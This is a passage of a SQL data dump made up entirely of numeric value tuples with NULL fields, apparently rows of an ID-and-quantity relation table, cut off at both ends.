LL,NULL),(32,203,NULL,30,NULL,NULL),(32,194,NULL,15,NULL,NULL),(32,23,NULL,10,NULL,NULL),(85,148,NULL,4,NULL,NULL),(85,91,NULL,15,NULL,NULL),(85,104,NULL,4,NULL,NULL),(85,103,NULL,5,NULL,NULL),(85,94,NULL,5,NULL,NULL),(85,156,NULL,5,NULL,NULL),(85,97,NULL,5,NULL,NULL),(85,90,NULL,5,NULL,NULL),(88,117,NULL,10,NULL,NULL),(46,103,NULL,5,NULL,NULL),(31,101,NULL,80,NULL,NULL),(31,23,NULL,15,NULL,NULL),(31,91,NULL,10,NULL,NULL),(31,148,NULL,4,NULL,NULL),(31,96,NULL,4,NULL,NULL),(31,109,NULL,50,NULL,NULL),(31,90,NULL,10,NULL,NULL),(31,93,NULL,40,NULL,NULL),(100,101,NULL,130,NULL,NULL),(39,148,NULL,4,NULL,NULL),(39,91,NULL,20,NULL,NULL),(39,52,NULL,20,NULL,NULL),(39,100,NULL,4,NULL,NULL),(39,162,NULL,4,NULL,NULL),(83,17,NULL,5,NULL,NULL),(83,103,NULL,10,NULL,NULL),(83,194,NULL,25,NULL,NULL),(83,196,NULL,8,NULL,NULL),(83,195,NULL,5,NULL,NULL),(83,148,NULL,8,NULL,NULL),(83,52,NULL,10,NULL,NULL),(83,101,NULL,100,NULL,NULL),(83,82,NULL,35,NULL,NULL),(83,106,NULL,40,NULL,NULL),(38,91,NULL,20,NULL,NULL),(38,103,NULL,10,NULL,NULL),(38,52,NULL,15,NULL,NULL),(38,151,NULL,4,NULL,NULL),(38,150,NULL,15,NULL,NULL),(38,95,NULL,130,NULL,NULL),(38,119,NULL,10,NULL,NULL),(101,23,NULL,30,NULL,NULL),(101,50,NULL,30,NULL,NULL),(101,29,NULL,50,NULL,NULL),(101,74,NULL,50,NULL,NULL),(101,91,NULL,20,NULL,NULL),(101,52,NULL,20,NULL,NULL),(101,157,NULL,5,NULL,NULL),(101,171,NULL,5,NULL,NULL),(101,103,NULL,5,NULL,NULL),(101,109,NULL,25,NULL,NULL),(101,101,NULL,50,NULL,NULL),(101,148,NULL,5,NULL,NULL),(102,171,NULL,10,NULL,NULL),(52,197,NULL,20,NULL,NULL),(104,203,NULL,50,NULL,NULL),(105,121,NULL,150,NULL,NULL),(106,121,NULL,100,NULL,NULL),(58,50,NULL,10,NULL,NULL),(58,82,NULL,10,NULL,NULL),(58,86,NULL,10,NULL,NULL),(58,101,NULL,40,NULL,NULL),(58,102,NULL,20,NULL,NULL),(58,183,NULL,10,NULL,NULL),(58,55,NULL,10,NULL,NULL),(58,165,NULL,10,NULL,NULL),(58,91,NULL,10,NULL,NULL),(58,100,NULL,8,NULL,NULL),(58,181,NULL,1,NULL,NULL),(99,109,NULL,100,NULL,NULL),(51,113,NULL,15,NULL,NULL),(51,52,NULL,5,NULL,NULL),(51,91,NULL,5,NULL,NULL),(51,168,NULL,10,NULL,NULL),(51,55,NULL,10,NULL,NULL),(51,99,NULL,3,NULL,NULL),(51,101,NULL,70,NULL,NULL),(51,132,NULL,10,NULL,NULL),(51,148,NULL,4,NULL,NULL),(51,183,NULL,10,NULL,NULL),(51,182,NULL,10,NULL,NULL),(107,101,NULL,200,NULL,NULL),(108,108,NULL,30,NULL,NULL),(109,128,NULL,10,NULL,NULL),(91,82,NULL,20,NULL,NULL),(91,52,NULL,10,NULL,NULL),(91,92,NULL,100,NULL,NULL),(91,37,NULL,50,NULL,NULL),(110,205,NULL,92,NULL,NULL),(111,110,NULL,80,NULL,NULL),(111,93,NULL,30,NULL,NULL),(111,109,NULL,25,NULL,NULL),(111,148,NULL,5,NULL,NULL),(111,157,NULL,5,NULL,NULL),(111,103,NULL,3,NULL,NULL),(105,101,NULL,80,NULL,NULL),(105,52,NULL,20,NULL,NULL),(105,91,NULL,20,NULL,NULL),(105,82,NULL,20,NULL,NULL),(105,74,NULL,20,NULL,NULL),(102,156,NULL,10,NULL,NULL),(102,94,NULL,15,NULL,NULL),(102,112,NULL,4,NULL,NULL),(106,204,NULL,1,NULL,NULL),(106,74,NULL,10,NULL,NULL),(106,86,NULL,20,NULL,NULL),(106,82,NULL,20,NULL,NULL),(106,148,NULL,4,NULL,NULL),(106,182,NULL,10,NULL,NULL),(106,155,NULL,10,NULL,NULL),(106,100,NULL,10,NULL,NULL),(112,207,NULL,20,NULL,NULL),(113,101,NULL,100,NULL,NULL),(114,91,NULL,50,NULL,NULL),(115,101,NULL,120,NULL,NULL),(116,211,NULL,150,NULL,NULL),(119,101,NULL,120,NULL,NULL),(120,101,NULL,130,NULL,NULL),(121,109,NULL,60,NULL,NULL),(122,101,NULL,50,NULL,NULL),(123,95,NULL,130,NULL,NULL),(124,211,NULL,150,NULL,NULL),(125,101,NULL,120,NULL,NULL),(126,101,NULL,180,NULL,NULL),(128,101,NULL,200,NULL,NULL),(129,109,NULL,100,NULL,NULL),(130,109,NULL,100,NULL,NULL),(131,109,NULL,100,NULL,NULL),(131,75,NULL,30,NULL,NULL),(131,91,NULL,20,NULL,NULL),(131,50,NULL,20,NULL,NULL),(131,86,NULL,20,NULL,NULL),(131,82,NULL,20,NULL,NULL),(131,213,NULL,20,NULL,NULL),(132,101,NULL,120,NULL,NULL),(133,214,NULL,50,NULL,NULL),(134,211,NULL,120,NULL,NULL),(135,101,NULL,130,NULL,NULL),(136,101,NULL,130,NULL,NULL),(137,91,NULL,10,NULL,NULL),(75,108,NULL,30,NULL,NULL),(75,52,NULL,10,NULL,NULL),(75,103,NULL,10,NULL,NULL),(75,148,NULL,4,NULL,NULL),(139,209,NULL,25,NULL,NULL),(122,109,NULL,100,NULL,NULL),(122,91,NULL,10,NULL,NULL),(122,52,NULL,10,NULL,NULL),(122,82,NULL,10,NULL,NULL),(122,206,NULL,10,NULL,NULL),(122,123,NULL,10,NULL,NULL),(122,132,NULL,10,NULL,NULL),(129,52,NULL,10,NULL,NULL),(129,82,NULL,15,NULL,NULL),(129,91,NULL,10,NULL,NULL),(129,103,NULL,5,NULL,NULL),(129,90,NULL,5,NULL,NULL),(129,206,NULL,10,NULL,NULL),(129,204,NULL,1,NULL,NULL),(140,91,NULL,100,NULL,NULL),(141,95,NULL,100,NULL,NULL),(141,55,NULL,100,NULL,NULL),(141,52,NULL,20,NULL,NULL),(141,214,NULL,100,NULL,NULL),(141,206,NULL,40,NULL,NULL),(141,123,NULL,50,NULL,NULL),(142,206,NULL,3,NULL,NULL),(143,101,NULL,80,NULL,NULL),(144,206,NULL,15,NULL,NULL),(145,109,NULL,50,NULL,NULL),(146,101,NULL,130,NULL,NULL),(146,123,NULL,10,NULL,NULL),(146,55,NULL,20,NULL,NULL),(146,194,NULL,15,NULL,NULL),(146,148,NULL,5,NULL,NULL),(146,156,NULL,5,NULL,NULL),(146,91,NULL,30,NULL,NULL),(95,101,NULL,90,NULL,NULL),(95,103,NULL,10,NULL,NULL),(95,157,NULL,5,NULL,NULL),(95,109,NULL,50,NULL,NULL),(95,91,NULL,15,NULL,NULL),(95,52,NULL,10,NULL,NULL),(95,148,NULL,10,NULL,NULL),(142,94,NULL,7,NULL,NULL),(142,202,NULL,25,NULL,NULL),(142,109,NULL,15,NULL,NULL),(142,216,NULL,1,NULL,NULL),(109,109,NULL,50,NULL,NULL),(109,108,NULL,60,NULL,NULL),(109,101,NULL,30,NULL,NULL),(109,148,NULL,4,NULL,NULL),(109,186,NULL,15,NULL,NULL),(18,151,NULL,4,NULL,NULL),(18,101,NULL,100,NULL,NULL),(18,103,NULL,5,NULL,NULL),(18,91,NULL,20,NULL,NULL),(18,148,NULL,5,NULL,NULL),(18,52,NULL,20,NULL,NULL),(18,119,NULL,2,NULL,NULL),(82,50,NULL,10,NULL,NULL),(82,91,NULL,10,NULL,NULL),(82,148,NULL,4,NULL,NULL),(82,109,NULL,25,NULL,NULL),(61,93,NULL,30,NULL,NULL),(61,50,NULL,20,NULL,NULL),(61,82,NULL,30,NULL,NULL),(61,101,NULL,80,NULL,NULL),(61,156,NULL,5,NULL,NULL),(61,21,NULL,20,NULL,NULL),(50,86,NULL,25,NULL,NULL),(50,82,NULL,20,NULL,NULL),(50,102,NULL,20,NULL,NULL),(50,101,NULL,70,NULL,NULL),(50,182,NULL,15,NULL,NULL),(50,91,NULL,10,NULL,NULL),(50,202,NULL,40,NULL,NULL),(133,50,NULL,50,NULL,NULL),(133,101,NULL,150,NULL,NULL),(133,91,NULL,20,NULL,NULL),(133,148,NULL,4,NULL,NULL),(133,111,NULL,10,NULL,NULL),(133,96,NULL,10,NULL,NULL),(147,123,NULL,20,NULL,NULL),(148,214,NULL,100,NULL,NULL),(136,123,NULL,30,NULL,NULL),(136,206,NULL,20,NULL,NULL),(136,55,NULL,15,NULL,NULL),(136,189,NULL,2,NULL,NULL),(136,214,NULL,30,NULL,NULL),(149,75,NULL,200,NULL,NULL),(150,196,NULL,20,NULL,NULL),(151,109,NULL,50,NULL,NULL),(152,101,NULL,130,NULL,NULL),(153,109,NULL,75,NULL,NULL),(24,109,NULL,50,NULL,NULL),(24,101,NULL,100,NULL,NULL),(24,148,NULL,4,NULL,NULL),(24,91,NULL,15,NULL,NULL),(24,151,NULL,8,NULL,NULL),(24,90,NULL,10,NULL,NULL),(24,50,NULL,20,NULL,NULL),(149,82,NULL,15,NULL,NULL),(149,52,NULL,10,NULL,NULL),(149,211,NULL,200,NULL,NULL),(149,148,NULL,10,NULL,NULL),(149,103,NULL,2,NULL,NULL),(149,157,NULL,2,NULL,NULL),(107,148,NULL,10,NULL,NULL),(107,182,NULL,20,NULL,NULL),(154,214,NULL,50,NULL,NULL),(155,52,NULL,5,NULL,NULL),(156,92,NULL,50,NULL,NULL),(156,52,NULL,10,NULL,NULL),(156,82,NULL,20,NULL,NULL),(156,157,NULL,3,NULL,NULL),(156,5,NULL,10,NULL,NULL),(156,204,NULL,1,NULL,NULL),(156,2,NULL,10,NULL,NULL),(156,86,NULL,20,NULL,NULL),(156,21,NULL,10,NULL,NULL),(156,103,NULL,2,NULL,NULL),(156,156,NULL,5,NULL,NULL),(157,109,NULL,75,NULL,NULL),(158,109,NULL,70,NULL,NULL),(159,106,NULL,50,NULL,NULL),(159,101,NULL,120,NULL,NULL),(159,91,NULL,20,NULL,NULL),(159,52,NULL,20,NULL,NULL),(159,96,NULL,10,NULL,NULL),(159,111,NULL,5,NULL,NULL),(159,148,NULL,5,NULL,NULL),(160,211,NULL,200,NULL,NULL),(161,19,NULL,100,NULL,NULL),(161,128,NULL,40,NULL,NULL),(161,129,NULL,10,NULL,NULL),(161,197,NULL,10,NULL,NULL),(161,122,NULL,5,NULL,NULL),(161,94,NULL,10,NULL,NULL),(161,5,NULL,10,NULL,NULL),(162,95,NULL,120,NULL,NULL),(163,211,NULL,70,NULL,NULL),(164,101,NULL,130,NULL,NULL),(96,202,NULL,50,NULL,NULL),(96,94,NULL,20,NULL,NULL),(96,148,NULL,4,NULL,NULL),(96,206,NULL,10,NULL,NULL),(165,211,NULL,150,NULL,NULL),(166,218,NULL,50,NULL,NULL),(167,91,NULL,20,NULL,NULL),(168,101,NULL,130,NULL,NULL),(151,75,NULL,200,NULL,NULL),(151,52,NULL,10,NULL,NULL),(151,82,NULL,25,NULL,NULL),(151,148,NULL,10,NULL,NULL),(151,103,NULL,3,NULL,NULL),(108,109,NULL,50,NULL,NULL),(108,148,NULL,4,NULL,NULL),(169,95,NULL,150,NULL,NULL),(172,211,NULL,100,NULL,NULL),(77,23,NULL,10,NULL,NULL),(77,50,NULL,10,NULL,NULL),(77,91,NULL,10,NULL,NULL),(77,74,NULL,10,NULL,NULL),(77,104,NULL,8,NULL,NULL),(77,111,NULL,5,NULL,NULL),(77,96,NULL,5,NULL,NULL),(77,109,NULL,25,NULL,NULL),(173,101,NULL,50,NULL,NULL),(174,101,NULL,100,NULL,NULL),(174,202,NULL,30,NULL,NULL),(174,148,NULL,5,NULL,NULL),(174,182,NULL,20,NULL,NULL),(174,17,NULL,4,NULL,NULL),(175,148,NULL,10,NULL,NULL),(173,109,NULL,50,NULL,NULL),(173,96,NULL,5,NULL,NULL),(173,111,NULL,5,NULL,NULL),(173,90,NULL,10,NULL,NULL),(117,209,NULL,10,NULL,NULL),(176,211,NULL,150,NULL,NULL),(177,203,NULL,100,NULL,NULL),(177,101,NULL,100,NULL,NULL),(177,82,NULL,15,NULL,NULL),(177,194,NULL,5,NULL,NULL),(177,148,NULL,5,NULL,NULL),(43,101,NULL,100,NULL,NULL),(23,52,NULL,15,NULL,NULL),(23,23,NULL,25,NULL,NULL),(23,59,NULL,20,NULL,NULL),(23,21,NULL,15,NULL,NULL),(23,74,NULL,30,NULL,NULL),(23,55,NULL,20,NULL,NULL),(23,50,NULL,15,NULL,NULL),(23,91,NULL,15,NULL,NULL),(23,135,NULL,8,NULL,NULL),(23,151,NULL,4,NULL,NULL),(23,111,NULL,4,NULL,NULL),(23,97,NULL,4,NULL,NULL),(23,101,NULL,80,NULL,NULL),(175,52,NULL,30,NULL,NULL),(175,101,NULL,120,NULL,NULL),(175,209,NULL,5,NULL,NULL),(175,201,NULL,10,NULL,NULL),(175,210,NULL,5,NULL,NULL),(175,17,NULL,3,NULL,NULL),(175,119,NULL,3,NULL,NULL),(178,86,NULL,30,NULL,NULL),(34,91,NULL,20,NULL,NULL),(34,52,NULL,15,NULL,NULL),(34,114,NULL,4,NULL,NULL),(34,148,NULL,4,NULL,NULL),(34,93,NULL,40,NULL,NULL),(34,50,NULL,15,NULL,NULL),(34,74,NULL,15,NULL,NULL),(179,101,NULL,130,NULL,NULL),(180,211,NULL,200,NULL,NULL),(181,101,NULL,250,NULL,NULL),(182,101,NULL,200,NULL,NULL),(183,101,NULL,150,NULL,NULL),(184,61,NULL,15,NULL,NULL),(185,109,NULL,100,NULL,NULL),(184,123,NULL,15,NULL,NULL),(184,109,NULL,100,NULL,NULL),(184,209,NULL,5,NULL,NULL),(186,101,NULL,160,NULL,NULL),(187,101,NULL,250,NULL,NULL),(188,108,NULL,30,NULL,NULL),(189,101,NULL,80,NULL,NULL),(190,211,NULL,250,NULL,NULL),(190,100,NULL,15,NULL,NULL),(190,39,NULL,10,NULL,NULL),(190,148,NULL,5,NULL,NULL),(190,108,NULL,30,NULL,NULL),(191,106,NULL,50,NULL,NULL),(192,52,NULL,30,NULL,NULL),(64,102,NULL,10,NULL,NULL),(64,148,NULL,4,NULL,NULL),(64,101,NULL,80,NULL,NULL),(64,182,NULL,15,NULL,NULL),(64,82,NULL,10,NULL,NULL),(64,91,NULL,5,NULL,NULL),(193,101,NULL,120,NULL,NULL),(193,121,NULL,90,NULL,NULL),(193,148,NULL,5,NULL,NULL),(193,130,NULL,20,NULL,NULL),(193,137,NULL,10,NULL,NULL),(193,178,NULL,5,NULL,NULL),(193,55,NULL,20,NULL,NULL),(193,102,NULL,20,NULL,NULL),(194,86,NULL,50,NULL,NULL),(160,148,NULL,5,NULL,NULL),(160,209,NULL,10,NULL,NULL),(160,210,NULL,10,NULL,NULL),(160,109,NULL,100,NULL,NULL),(127,101,NULL,130,NULL,NULL),(63,101,NULL,25,NULL,NULL),(63,109,NULL,50,NULL,NULL),(63,102,NULL,20,NULL,NULL),(63,148,NULL,4,NULL,NULL),(63,186,NULL,15,NULL,NULL),(147,206,NULL,5,NULL,NULL),(147,199,NULL,3,NULL,NULL),(169,91,NULL,50,NULL,NULL),(169,96,NULL,8,NULL,NULL),(169,103,NULL,3,NULL,NULL),(169,17,NULL,10,NULL,NULL),(169,93,NULL,40,NULL,NULL),(169,179,NULL,10,NULL,NULL),(169,94,NULL,5,NULL,NULL),(169,148,NULL,5,NULL,NULL),(169,6,NULL,3,NULL,NULL),(42,148,NULL,4,NULL,NULL),(126,91,NULL,20,NULL,NULL),(126,52,NULL,10,NULL,NULL),(126,90,NULL,15,NULL,NULL),(126,96,NULL,10,NULL,NULL),(126,111,NULL,10,NULL,NULL),(126,103,NULL,5,NULL,NULL),(126,119,NULL,3,NULL,NULL),(126,148,NULL,8,NULL,NULL),(113,132,NULL,30,NULL,NULL),(113,55,NULL,10,NULL,NULL),(113,165,NULL,10,NULL,NULL),(113,148,NULL,5,NULL,NULL),(113,131,NULL,50,NULL,NULL),(113,123,NULL,30,NULL,NULL),(119,148,NULL,10,NULL,NULL),(119,96,NULL,5,NULL,NULL),(119,212,NULL,10,NULL,NULL),(119,52,NULL,10,NULL,NULL),(119,17,NULL,3,NULL,NULL),(119,103,NULL,5,NULL,NULL),(119,109,NULL,50,NULL,NULL),(171,82,NULL,10,NULL,NULL),(22,91,NULL,20,NULL,NULL),(22,50,NULL,25,NULL,NULL),(22,52,NULL,15,NULL,NULL),(22,148,NULL,8,NULL,NULL),(22,100,NULL,15,NULL,NULL),(154,74,NULL,30,NULL,NULL),(154,52,NULL,10,NULL,NULL),(154,50,NULL,10,NULL,NULL),(154,91,NULL,10,NULL,NULL),(154,101,NULL,100,NULL,NULL),(154,96,NULL,5,NULL,NULL),(154,111,NULL,5,NULL,NULL),(154,148,NULL,5,NULL,NULL),(143,194,NULL,15,NULL,NULL),(143,148,NULL,5,NULL,NULL),(143,103,NULL,3,NULL,NULL),(143,157,NULL,3,NULL,NULL),(143,93,NULL,40,NULL,NULL),(143,52,NULL,15,NULL,NULL),(143,82,NULL,15,NULL,NULL),(29,100,NULL,4,NULL,NULL),(29,108,NULL,30,NULL,NULL),(29,148,NULL,4,NULL,NULL),(44,217,NULL,250,NULL,NULL),(97,128,NULL,50,NULL,NULL),(97,197,NULL,7,NULL,NULL),(97,94,NULL,15,NULL,NULL),(97,109,NULL,50,NULL,NULL),(103,202,NULL,50,NULL,NULL),(195,217,NULL,300,NULL,NULL),(195,123,NULL,20,NULL,NULL),(195,148,NULL,5,NULL,NULL),(196,101,NULL,250,NULL,NULL),(197,101,NULL,250,NULL,NULL),(198,16,NULL,50,NULL,NULL),(16,23,NULL,10,NULL,NULL),(16,21,NULL,10,NULL,NULL),(16,52,NULL,10,NULL,NULL),(16,101,NULL,30,NULL,NULL),(16,130,NULL,15,NULL,NULL),(16,108,NULL,60,NULL,NULL),(16,74,NULL,10,NULL,NULL),(52,94,NULL,30,NULL,NULL),(52,173,NULL,15,NULL,NULL),(52,175,NULL,1,NULL,NULL),(52,19,NULL,60,NULL,NULL),(52,37,NULL,60,NULL,NULL),(199,194,NULL,30,NULL,NULL),(88,122,NULL,2,NULL,NULL),(88,19,NULL,50,NULL,NULL),(88,5,NULL,3,NULL,NULL),(88,194,NULL,100,NULL,NULL),(88,128,NULL,20,NULL,NULL),(13,98,NULL,2,NULL,NULL),(13,82,NULL,40,NULL,NULL),(13,52,NULL,25,NULL,NULL),(13,148,NULL,4,NULL,NULL),(13,108,NULL,60,NULL,NULL),(13,103,NULL,5,NULL,NULL),(94,202,NULL,25,NULL,NULL),(94,197,NULL,7,NULL,NULL),(94,94,NULL,15,NULL,NULL),(94,117,NULL,5,NULL,NULL),(167,29,NULL,30,NULL,NULL),(167,23,NULL,20,NULL,NULL),(167,21,NULL,10,NULL,NULL),(167,50,NULL,30,NULL,NULL),(167,75,NULL,50,NULL,NULL),(167,82,NULL,50,NULL,NULL),(167,194,NULL,10,NULL,NULL),(167,148,NULL,3,NULL,NULL),(167,202,NULL,40,NULL,NULL),(167,52,NULL,10,NULL,NULL),(167,101,NULL,100,NULL,NULL),(165,148,NULL,5,NULL,NULL),(165,202,NULL,40,NULL,NULL),(165,52,NULL,10,NULL,NULL),(182,91,NULL,40,NULL,NULL),(182,52,NULL,20,NULL,NULL),(182,103,NULL,5,NULL,NULL),(182,109,NULL,50,NULL,NULL),(182,93,NULL,40,NULL,NULL),(182,50,NULL,20,NULL,NULL),(182,148,NULL,5,NULL,NULL),(182,96,NULL,10,NULL,NULL),(182,115,NULL,15,NULL,NULL),(181,55,NULL,30,NULL,NULL),(181,178,NULL,5,NULL,NULL),(181,137,NULL,20,NULL,NULL),(181,115,NULL,5,NULL,NULL),(181,97,NULL,5,NULL,NULL),(181,148,NULL,5,NULL,NULL),(181,21,NULL,10,NULL,NULL),(181,50,NULL,30,NULL,NULL),(181,59,NULL,10,NULL,NULL),(181,214,NULL,30,NULL,NULL),(181,96,NULL,5,NULL,NULL),(187,148,NULL,10,NULL,NULL),(187,91,NULL,10,NULL,NULL),(187,55,NULL,10,NULL,NULL),(187,103,NULL,2,NULL,NULL),(187,194,NULL,10,NULL,NULL),(187,123,NULL,5,NULL,NULL),(187,111,NULL,10,NULL,NULL),(187,137,NULL,10,NULL,NULL),(196,123,NULL,50,NULL,NULL),(196,206,NULL,10,NULL,NULL),(196,131,NULL,30,NULL,NULL),(196,132,NULL,10,NULL,NULL),(196,214,NULL,30,NULL,NULL),(196,59,NULL,20,NULL,NULL),(188,86,NULL,20,NULL,NULL),(188,74,NULL,20,NULL,NULL),(188,50,NULL,20,NULL,NULL),(188,182,NULL,10,NULL,NULL),(188,109,NULL,25,NULL,NULL),(188,213,NULL,5,NULL,NULL),(200,221,NULL,500,NULL,NULL),(201,222,NULL,350,NULL,NULL),(202,211,NULL,150,NULL,NULL),(172,148,NULL,5,NULL,NULL),(172,86,NULL,70,NULL,NULL),(172,82,NULL,50,NULL,NULL),(172,213,NULL,30,NULL,NULL),(172,5,NULL,5,NULL,NULL),(203,55,NULL,10,NULL,NULL),(204,121,NULL,74,NULL,NULL),(205,128,NULL,40,NULL,NULL),(185,223,NULL,150,NULL,NULL),(185,117,NULL,5,NULL,NULL),(185,202,NULL,25,NULL,NULL),(185,94,NULL,10,NULL,NULL),(207,181,NULL,1,NULL,NULL),(208,101,NULL,50,NULL,NULL),(209,93,NULL,50,NULL,NULL),(210,121,NULL,80,NULL,NULL),(211,108,NULL,60,NULL,NULL),(212,19,NULL,100,NULL,NULL),(213,109,NULL,100,NULL,NULL),(214,101,NULL,100,NULL,NULL),(214,109,NULL,100,NULL,NULL),(214,55,NULL,10,NULL,NULL),(214,214,NULL,30,NULL,NULL),(214,50,NULL,30,NULL,NULL),(214,75,NULL,30,NULL,NULL),(214,131,NULL,15,NULL,NULL),(214,148,NULL,10,NULL,NULL),(214,130,NULL,15,NULL,NULL),(215,109,NULL,100,NULL,NULL),(215,50,NULL,20,NULL,NULL),(215,214,NULL,20,NULL,NULL),(215,75,NULL,20,NULL,NULL),(215,204,NULL,40,NULL,NULL),(215,108,NULL,50,NULL,NULL),(216,37,NULL,30,NULL,NULL),(216,94,NULL,5,NULL,NULL),(217,108,NULL,40,NULL,NULL),(217,109,NULL,100,NULL,NULL),(217,101,NULL,50,NULL,NULL),(217,148,NULL,10,NULL,NULL),(217,100,NULL,10,NULL,NULL),(217,137,NULL,10,NULL,NULL),(217,206,NULL,5,NULL,NULL),(217,204,NULL,50,NULL,NULL),(218,93,NULL,50,NULL,NULL),(218,91,NULL,10,NULL,NULL),(218,50,NULL,10,NULL,NULL),(218,21,NULL,10,NULL,NULL),(218,23,NULL,10,NULL,NULL),(218,74,NULL,20,NULL,NULL),(218,109,NULL,50,NULL,NULL),(218,101,NULL,50,NULL,NULL),(218,148,NULL,5,NULL,NULL),(219,181,NULL,1,NULL,NULL),(220,109,NULL,100,NULL,NULL),(212,109,NULL,100,NULL,NULL),(212,174,NULL,20,NULL,NULL),(212,128,NULL,30,NULL,NULL),(212,148,NULL,5,NULL,NULL),(212,117,NULL,5,NULL,NULL),(213,174,NULL,15,NULL,NULL),(213,128,NULL,30,NULL,NULL),(213,148,NULL,5,NULL,NULL),(213,94,NULL,15,NULL,NULL),(213,5,NULL,15,NULL,NULL),(27,130,NULL,15,NULL,NULL),(27,123,NULL,10,NULL,NULL),(27,156,NULL,4,NULL,NULL),(27,90,NULL,15,NULL,NULL),(27,108,NULL,80,NULL,NULL),(27,102,NULL,10,NULL,NULL),(221,101,NULL,100,NULL,NULL),(222,101,NULL,200,NULL,NULL),(198,109,NULL,50,NULL,NULL),(198,86,NULL,60,NULL,NULL),(198,102,NULL,50,NULL,NULL),(198,52,NULL,20,NULL,NULL),(223,101,NULL,100,NULL,NULL),(224,131,NULL,50,NULL,NULL),(225,109,NULL,100,NULL,NULL),(226,121,NULL,74,NULL,NULL),(36,101,NULL,120,NULL,NULL),(36,52,NULL,15,NULL,NULL),(36,148,NULL,10,NULL,NULL),(36,103,NULL,5,NULL,NULL),(36,194,NULL,15,NULL,NULL),(227,101,NULL,120,NULL,NULL),(19,103,NULL,5,NULL,NULL),(19,82,NULL,50,NULL,NULL),(19,148,NULL,15,NULL,NULL),(19,202,NULL,40,NULL,NULL),(19,194,NULL,15,NULL,NULL),(157,23,NULL,10,NULL,NULL),(157,21,NULL,15,NULL,NULL),(157,50,NULL,10,NULL,NULL),(157,91,NULL,15,NULL,NULL),(157,101,NULL,50,NULL,NULL),(157,52,NULL,10,NULL,NULL),(157,55,NULL,10,NULL,NULL),(157,148,NULL,5,NULL,NULL),(228,108,NULL,90,NULL,NULL),(229,218,NULL,60,NULL,NULL),(230,2,NULL,20,NULL,NULL),(230,5,NULL,20,NULL,NULL),(230,200,NULL,20,NULL,NULL),(231,77,NULL,100,NULL,NULL),(232,186,NULL,20,NULL,NULL),(232,205,NULL,40,NULL,NULL),(232,157,NULL,5,NULL,NULL),(232,91,NULL,5,NULL,NULL),(232,52,NULL,10,NULL,NULL),(232,103,NULL,3,NULL,NULL),(232,108,NULL,40,NULL,NULL),(232,102,NULL,30,NULL,NULL),(232,82,NULL,20,NULL,NULL),(232,86,NULL,20,NULL,NULL),(232,148,NULL,5,NULL,NULL),(233,205,NULL,50,NULL,NULL),(233,52,NULL,10,NULL,NULL),(233,82,NULL,10,NULL,NULL),(233,157,NULL,3,NULL,NULL),(233,103,NULL,3,NULL,NULL),(233,148,NULL,5,NULL,NULL),(233,202,NULL,50,NULL,NULL),(209,74,NULL,20,NULL,NULL),(209,91,NULL,30,NULL,NULL),(209,50,NULL,30,NULL,NULL),(209,21,NULL,30,NULL,NULL),(209,23,NULL,30,NULL,NULL),(209,148,NULL,5,NULL,NULL),(234,108,NULL,60,NULL,NULL),(234,206,NULL,30,NULL,NULL),(235,37,NULL,70,NULL,NULL),(235,39,NULL,30,NULL,NULL),(235,102,NULL,30,NULL,NULL),(235,86,NULL,30,NULL,NULL),(235,50,NULL,20,NULL,NULL),(235,21,NULL,20,NULL,NULL),(236,29,NULL,50,NULL,NULL),(236,23,NULL,20,NULL,NULL),(236,50,NULL,40,NULL,NULL),(236,59,NULL,40,NULL,NULL),(236,82,NULL,50,NULL,NULL),(236,52,NULL,30,NULL,NULL),(236,103,NULL,5,NULL,NULL),(236,157,NULL,3,NULL,NULL),(236,148,NULL,5,NULL,NULL),(236,202,NULL,30,NULL,NULL),(237,93,NULL,50,NULL,NULL),(237,23,NULL,30,NULL,NULL),(237,29,NULL,100,NULL,NULL),(237,157,NULL,3,NULL,NULL),(237,52,NULL,10,NULL,NULL),(237,91,NULL,10,NULL,NULL),(237,103,NULL,3,NULL,NULL),(237,109,NULL,25,NULL,NULL),(237,148,NULL,10,NULL,NULL),(237,17,NULL,2,NULL,NULL),(110,91,NULL,10,NULL,NULL),(110,52,NULL,10,NULL,NULL),(110,103,NULL,5,NULL,NULL),(110,148,NULL,5,NULL,NULL),(110,101,NULL,100,NULL,NULL),(110,109,NULL,20,NULL,NULL),(110,121,NULL,30,NULL,NULL),(100,148,NULL,10,NULL,NULL),(100,50,NULL,20,NULL,NULL),(100,103,NULL,5,NULL,NULL),(100,91,NULL,10,NULL,NULL),(100,194,NULL,15,NULL,NULL),(100,111,NULL,10,NULL,NULL),(100,137,NULL,10,NULL,NULL),(100,23,NULL,10,NULL,NULL),(100,75,NULL,15,NULL,NULL),(205,52,NULL,5,NULL,NULL),(205,157,NULL,2,NULL,NULL),(205,103,NULL,2,NULL,NULL),(205,109,NULL,50,NULL,NULL),(205,148,NULL,5,NULL,NULL),(205,82,NULL,10,NULL,NULL),(205,50,NULL,25,NULL,NULL),(178,82,NULL,20,NULL,NULL),(178,101,NULL,90,NULL,NULL),(178,213,NULL,10,NULL,NULL),(178,5,NULL,3,NULL,NULL),(178,87,NULL,35,NULL,NULL),(178,155,NULL,5,NULL,NULL),(178,123,NULL,5,NULL,NULL),(41,135,NULL,20,NULL,NULL),(41,148,NULL,4,NULL,NULL),(41,111,NULL,4,NULL,NULL),(41,160,NULL,4,NULL,NULL),(41,52,NULL,20,NULL,NULL),(224,209,NULL,10,NULL,NULL),(224,123,NULL,10,NULL,NULL),(224,132,NULL,10,NULL,NULL),(138,217,NULL,200,NULL,NULL),(135,123,NULL,20,NULL,NULL),(135,206,NULL,5,NULL,NULL),(135,55,NULL,10,NULL,NULL),(112,132,NULL,10,NULL,NULL),(112,109,NULL,100,NULL,NULL),(112,206,NULL,10,NULL,NULL),(139,101,NULL,80,NULL,NULL),(139,132,NULL,20,NULL,NULL),(139,74,NULL,10,NULL,NULL),(139,82,NULL,10,NULL,NULL),(139,123,NULL,20,NULL,NULL),(139,148,NULL,10,NULL,NULL),(115,148,NULL,10,NULL,NULL),(115,156,NULL,5,NULL,NULL),(115,132,NULL,20,NULL,NULL),(115,123,NULL,30,NULL,NULL),(115,59,NULL,30,NULL,NULL),(114,109,NULL,75,NULL,NULL),(114,132,NULL,20,NULL,NULL),(114,207,NULL,10,NULL,NULL),(114,148,NULL,5,NULL,NULL),(116,148,NULL,15,NULL,NULL),(116,109,NULL,25,NULL,NULL),(116,122,NULL,15,NULL,NULL),(118,217,NULL,200,NULL,NULL),(118,123,NULL,30,NULL,NULL),(118,148,NULL,10,NULL,NULL),(118,82,NULL,20,NULL,NULL),(120,123,NULL,20,NULL,NULL),(120,132,NULL,20,NULL,NULL),(120,131,NULL,20,NULL,NULL),(120,148,NULL,10,NULL,NULL),(120,91,NULL,10,NULL,NULL),(223,194,NULL,10,NULL,NULL),(223